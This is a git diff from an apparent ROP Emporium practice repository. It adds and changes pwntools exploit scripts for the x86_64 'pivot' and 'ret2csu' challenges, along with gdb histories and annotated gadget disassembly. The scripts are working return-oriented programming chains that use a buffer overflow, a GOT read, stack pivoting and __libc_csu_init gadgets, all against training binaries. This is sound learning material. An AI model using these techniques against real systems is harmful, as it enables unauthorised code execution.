modified: x86_64/pivot/exploit.py

new file:   x86_64/pivot/exploit2.py
	deleted:    x86_64/pivot/stest
	deleted:    x86_64/pivot/test
	new file:   x86_64/pivot/todo
	new file:   x86_64/ret2csu/exploit.py
	new file:   x86_64/ret2csu/gadgets

x86_64/pivot/.gdb_history

@@ -143,3 +143,40 @@ info reg rbp
 info 0x60103a
 x/x 0x60103a
 quit
+continue
+context
+continue
+x/i rax 
+continue
+info reg rax
+stepi
+info reg rax
+quit
+continue
+info reg rax
+stepi
+info reg rax
+x/x $rax
+stepi
+info reg $rbp
+stepi
+x/x rax
+x/x $rax
+x/x 0x601040
+x/x 0x601040 + 279
+x/x 0x601040 - 279
+x/x 0x5173896a
+quit
+continue
+continue
+continue
+stepi
+x/x rax
+x/a $rax
+x/a got.plt
+x/a @got.plt
+x/x 0x7f795e45f96a + 279
+x/x 0x7f795e45f96a + 280
+stepi
+info reg rax
+quit

x86_64/pivot/exploit.py

@@ -3,21 +3,14 @@ from pwn import *
 from os import getcwd
 import re
 
-#context.terminal = ['kitty', 'sh', '-c']
-print(context.terminal)
-
-prog = gdb.debug('./pivot', gdbscript='''
-        b pwnme
-        b *0x4009a5
-'''
-
-)
+prog = process('./pivot')
 
 payload = b''
 payload += p64(0x0000000000400720)      # foothold@plt
 
 payload += p64(0x4009bb)                # pop rax
-payload += p64(601040)                  # foothold@plt's .got.plt entry
+payload += p64(0x601040)                # foothold@plt's .got.plt entry
+payload += p64(0x4009c0)                # mov rax, [rax]
 
 payload += p64(0x00000000004007c8)      # pop rbp
 payload += p64(279)                     # should be the offset of pwnem from foothold's .got.plt 
@@ -27,7 +20,6 @@ payload += p64(0x4009c4)                # adds the two
 payload += p64(0x00000000004007c1)      # jmp rax
 prog.sendline(payload)
 pivit_location = int(re.findall('0x[0-9a-z]{12}', prog.readregexS('0x[0-9a-z]{12}'))[0], 16)
-print(hex(pivit_location))
 
 payload = b''
 #buffer overflow

x86_64/pivot/exploit2.py

@@ -0,0 +1,37 @@
+#!/usr/bin/env python3
+from pwn import *
+from os import getcwd
+import re
+
+# 0000000000058b10 T printf
+# 000000000004a830 W system 
+
+prog = process('./pivot')
+
+payload = b''
+
+payload += p64(0x4009bb)                # pop rax
+payload += p64(0x601028)                # printf's .got.plt entry
+payload += p64(0x4009c0)                # mov rax, [rax]
+
+payload += p64(0x00000000004007c8)      # pop rbp
+payload += p64(279)                     # should be the offset of pwnem from foothold's .got.plt 
+
+payload += p64(0x4009c4)                # adds the two
+
+payload += p64(0x00000000004007c1)      # jmp rax
+prog.sendline(payload)
+pivit_location = int(re.findall('0x[0-9a-z]{12}', prog.readregexS('0x[0-9a-z]{12}'))[0], 16)
+
+payload = b''
+#buffer overflow
+for c in range(40):
+    payload += b'a'
+
+payload += p64(0x4009bb)                # pop rax
+payload += p64(pivit_location)          # pivot location
+payload += p64(0x4009bd)                # xchg rsp,rax
+
+prog.sendlineafter('Now please send your stack smash', payload)
+prog.interactive()
+

x86_64/pivot/test

@@ -1,12 +0,0 @@
-pivot by ROP Emporium
-x86_64
-
-Call ret2win() from libpivot
-The Old Gods kindly bestow upon you a place to pivot: 0x7f93a9160f10
-Send a ROP chain now and it will land there
-> Thank you!
-
-Now please send your stack smash
-> Thank you!
-
-Exiting

x86_64/pivot/todo

@@ -0,0 +1 @@
+do the thing with glibc

x86_64/ret2csu/.gdb_history

@@ -0,0 +1,56 @@
+continue
+context
+nexti
+quit
+continue
+context
+conitnue
+continue
+stepi
+stepi
+info reg rdx
+stepi
+info reg rbx
+info reg r12
+x/x 0x4006a2
+x/i 0x4006a2
+x/i *0x4006a2
+quit
+continue
+continue
+info reg rdi
+info reg edi
+quit
+break *0x40069a
+continue
+continue
+quit
+continue
+continue
+stepi
+quit
+break *0x40069a
+continue
+nexti
+stepi
+info reg rdx
+info reg rsi
+stepi
+info reg rsi
+info reg rdi
+info reg rdx
+info reg rsi
+stepi
+info reg rdi
+x 0x400510+0x200b0a
+x/x 601020
+x/x 0x601020
+x/x 0x00400516
+quit
+continue
+context
+continue
+stepi
+info reg rdi
+continue
+quit

x86_64/ret2csu/exploit.py

@@ -0,0 +1,27 @@
+#!/usr/bin/env python3
+from pwn import *
+
+prog = gdb.debug('./ret2csu', gdbscript='b *0x40069a')
+payload = b''
+for c in range(40):
+    payload += b'a'
+
+
+payload += p64(0x40069a)            # __libc_csu_init()
+payload += p64(0)
+payload += p64(0)
+payload += p64(0x601020)
+payload += p64(0xdeadbeefdeadbeef)
+payload += p64(0xcafebabecafebabe)
+payload += p64(0xd00df00dd00df00d)
+
+payload += p64(0x400680)
+
+
+#payload += p64(0x00000000004006a3)
+#payload += p64(0xdeadbeefdeadbeef)
+
+payload += b"\n"
+
+prog.sendline(payload)
+prog.interactive()

x86_64/ret2csu/gadgets

@@ -0,0 +1,86 @@
+First three arguments: 
+rdi   0xdeadbeefdeadbeef
+rsi   0xcafebabecafebabe
+rdx   0xd00df00dd00df00d
+
+
+weird-ass instructions:
+0x0000000000000a08 : retf 0xbabe
+
+
+ret2win@plt: 0000000000400510
+
+0x00000000004006a3 : pop rdi ; ret 
+0x00000000004006a1 : pop rsi ; pop r15 ; ret 
+
+
+
+
+ret2csu:     file format elf64-x86-64
+
+
+Disassembly of section .init:
+
+Disassembly of section .plt:
+
+Disassembly of section .text:
+
+0000000000400640 <__libc_csu_init>:
+  400640: 41 57                 push   r15
+  400642: 41 56                 push   r14
+  400644: 49 89 d7              mov    r15,rdx
+  400647: 41 55                 push   r13
+  400649: 41 54                 push   r12
+  40064b: 4c 8d 25 9e 07 20 00  lea    r12,[rip+0x20079e]        # 600df0 <__frame_dummy_init_array_entry>
+  400652: 55                    push   rbp
+  400653: 48 8d 2d 9e 07 20 00  lea    rbp,[rip+0x20079e]        # 600df8 <__do_global_dtors_aux_fini_array_entry>
+  40065a: 53                    push   rbx
+  40065b: 41 89 fd              mov    r13d,edi
+  40065e: 49 89 f6              mov    r14,rsi
+  400661: 4c 29 e5              sub    rbp,r12
+  400664: 48 83 ec 08           sub    rsp,0x8
+  400668: 48 c1 fd 03           sar    rbp,0x3
+  40066c: e8 5f fe ff ff        call   4004d0 <_init>
+  400671: 48 85 ed              test   rbp,rbp
+  400674: 74 20                 je     400696 <__libc_csu_init+0x56>
+  400676: 31 db                 xor    ebx,ebx
+  400678: 0f 1f 84 00 00 00 00  nop    DWORD PTR [rax+rax*1+0x0]
+  40067f: 00 
+ _______this shit is importaint!!!!!!
+\/
+  400680: 4c 89 fa              mov    rdx,r15
+  400683: 4c 89 f6              mov    rsi,r14
+  400686: 44 89 ef              mov    edi,r13d
+  400689: 41 ff 14 dc           call   QWORD PTR [r12+rbx*8]
+_________________________
+  40068d: 48 83 c3 01           add    rbx,0x1
+  400691: 48 39 dd              cmp    rbp,rbx
+  400694: 75 ea                 jne    400680 <__libc_csu_init+0x40> 
+  400696: 48 83 c4 08           add    rsp,0x8                       
+_________________________
+  40069a: 5b                    pop    rbx
+  40069b: 5d                    pop    rbp
+  40069c: 41 5c                 pop    r12
+  40069e: 41 5d                 pop    r13
+  4006a0: 41 5e                 pop    r14
+  4006a2: 41 5f                 pop    r15
+  4006a4: c3                    ret    
+
+Disassembly of section .fini:
+
+calling x86: 
+
+controlling rdx: 
+1: 0x00000000004006a3
+  rdi : 0xdeadbeefdeadbeef 
+
+2: 0x40069a
+  rbx: 0                          <--
+  rbp: whatever
+  r12: 0x601020                   <-- next location. lets try to make it ret2win
+  r13: 0xdeadbeef                 <-- would be nice if we could use a 64 bit value
+  r14: 0xcafebabecafebabe                 
+  r15: 0xd00df00dd00df00d         <--
+
+
+3: 0x0000000000400510 (ret2win)